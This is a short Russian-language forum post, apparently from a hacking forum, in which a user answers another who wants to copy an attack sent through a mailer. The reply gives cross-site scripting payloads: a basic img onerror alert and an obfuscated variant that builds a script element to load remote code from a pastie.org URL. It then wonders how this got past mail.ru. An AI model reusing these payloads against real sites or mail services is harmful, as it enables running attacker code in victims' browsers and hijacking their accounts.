Сообщение от vagabunt
|
|
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)
|
обычная xss ... вот пример покруче
<img src onerror=alert('XSS')>
вместо alert'а можно подставить, что хочешь.
и кстати, скрипт можно было вставить короче :
<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>
только вот вопрос.. как оно на mail.ru прошло?